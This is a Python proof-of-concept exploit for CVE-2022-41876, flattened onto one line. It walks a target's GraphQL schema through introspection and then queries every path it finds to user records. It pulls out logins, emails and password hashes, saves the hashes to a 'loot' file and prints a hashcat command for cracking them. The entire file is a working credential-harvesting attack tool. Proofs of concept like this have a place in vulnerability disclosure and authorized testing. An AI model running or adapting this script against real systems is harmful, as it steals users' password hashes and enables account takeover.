import requests import sys import os import argparse import json from R2Log import logger from R2Log import console from rich.table import Table from rich.live import Live # Define the type to search for TARGET_TYPE = 'User' # Parse args def parse_args(): parser = argparse.ArgumentParser(add_help=True, description='CVE-2022-41876 POC') parser.add_argument('url', action='store', help='Target URL (specify the graphql endpoint)') parser.add_argument('-t', '--thread', action='store_true', help='Number of threads') parser.add_argument('-f', '--file', action='store', help='Local path to introspect file') if len(sys.argv) == 1: parser.print_help() sys.exit(1) return parser.parse_args() def prepare_table(): # Create the results table table = Table(title="Contributor accounts found") table.add_column("Account id", justify="right", style="cyan", no_wrap=True) table.add_column("Name", justify="left", style="cyan", no_wrap=True) table.add_column("Login", justify="left", style="cyan", no_wrap=True) table.add_column("PasswordHash", justify="left", style="red", no_wrap=True) table.add_column("email", justify="left", style="cyan", no_wrap=True) table.add_column("Enabled", justify="left", style="cyan", no_wrap=True) table.add_column("maxLogin", justify="left", style="cyan", no_wrap=True) return table def introspection_query(url, introspect): logger.info("Retrieving data from the specified url or file") if introspect: try: with open(introspect, "r") as f: data = json.load(f) except FileNotFoundError: logger.error('The file "%s" does not exist' % introspect) sys.exit(1) except json.decoder.JSONDecodeError: logger.error('The file "%s" is not a correct JSON file' % introspect) sys.exit(1) else: r = requests.get('%s?query={__schema{types{name,fields{name,type{name}}}}}' % url) if r.status_code != 200: logger.error("The specified url returned status code %i" % r.status_code) logger.info("url = %s" % url) sys.exit(1) try: data = r.json() except requests.exceptions.JSONDecodeError: logger.error("Could not retrieve any JSON file from the specified endpoint.") logger.info("url = %s" % url) sys.exit(1) # Get the list of all types in the schema try: types = data['data']['__schema']['types'] except KeyError: logger.error("JSON file retrieved from specified url or file is not of the expected introspect format") sys.exit(1) logger.success("Data retrieved successfully\n") logger.info("Retrieving paths to users' hashes") # Create a dictionary to store the fields of each type type_fields = {} for t in types: if not t['fields']: type_fields[t['name']] = [] else: type_fields[t['name']] = [f['name'] for f in t['fields']] paths = find_paths('Domain', 'types', type_fields, types, set()) logger.success("Paths retrieved successfully\n") return paths # Define a recursive function to find paths to the target type def find_paths(current_type, current_path, type_fields, types, visited_types): # Check if we have already visited this type if current_type in visited_types: return [] # Add the current type to the visited types visited_types.add(current_type) # Check if we have reached the target type if current_type == TARGET_TYPE: return [current_path] # Check if the current type has any fields if not type_fields[current_type]: return [] # Recursively search for paths to the target type paths = [] for field in type_fields[current_type]: next_type = None for t in types: if t['name'] == current_type: for f in t['fields']: if f['name'] == field: next_type = f['type']['name'] break break if next_type is not None: next_path = current_path + '.' + field next_paths = find_paths(next_type, next_path, type_fields, types, visited_types.copy()) paths.extend(next_paths) return paths def get_user_info(data): users = [] if isinstance(data, list): for elem in data: users.append(get_user_info(elem)) return users elif isinstance(data, dict): if "id" in data: return (data["id"], data["name"], data["login"], data["passwordHash"], data["email"], data["enabled"], data["maxLogin"]) else: return get_user_info(data[list(data.keys())[0]]) def main(): args = parse_args() url = args.url introspect = args.file if 'graphql' not in url: logger.warning('The specified url does not contain "/graphql"\n') table = prepare_table() # Find all paths to the target type starting from the domain root paths = introspection_query(url, introspect) os.makedirs(os.path.dirname("./loot/hashes"), exist_ok=True) with Live(table, refresh_per_second=4, console=console) as live: with open("./loot/hashes.txt", "a+") as loot_file: logger.info('Retrieving hashes from found paths\n') found_users = [] errors = 0 error_displayed = False for path in paths: table.caption = " [yellow3]Request[/]: %d/%d (%3.1f%%)" % (paths.index(path), len(paths), round(paths.index(path) / len(paths) * 100, 1)) path = path.replace("types.", "{") path = path.replace(".", "{") + "{id,name,login,passwordHash,email,enabled,maxLogin" path += "}" * path.count("{") response = requests.get('%s?query=%s' % (url, path)) if response.status_code == 200: user_data = response.json() if "passwordHash" in str(user_data): extract = get_user_info(user_data) if isinstance(extract, list): for users in extract: if not users[0] in found_users: found_users.append(users[0]) loot_file.write(users[3]+"\n") table.add_row(str(users[0]), users[1], users[2], users[3], users[4], str(users[5]), str(users[6])) else: if not extract[0] in found_users: found_users.append(extract[0]) loot_file.write(extract[3]+"\n") table.add_row(str(extract[0]), extract[1], extract[2], extract[3], extract[4], str(extract[5]), str(extract[6])) else: errors += 1 error_rate = round(errors / len(paths) * 100, 1) if error_rate > 5 and not error_displayed: logger.warning("There is more than 5% error in server responses, check if the specified url is a valid graphql endpoint") logger.warning("url = %s\n" % url) error_displayed = True continue live.update(table) logger.info("It is possible to crack the hashes found with the following hashcat command:") console.print("{}hashcat --hash-type 3200 ./loot/hashes.txt $(fzf-wordlists){}\n".format("[bold green]", "[/bold green]")) console.print("{}Install {}Exegol{} or replace '$(fzf-wordlists)' with the path to your wordlist{}".format("[italic]", "[bold red]", "[/][italic]", "[/]")) if __name__ == '__main__': main()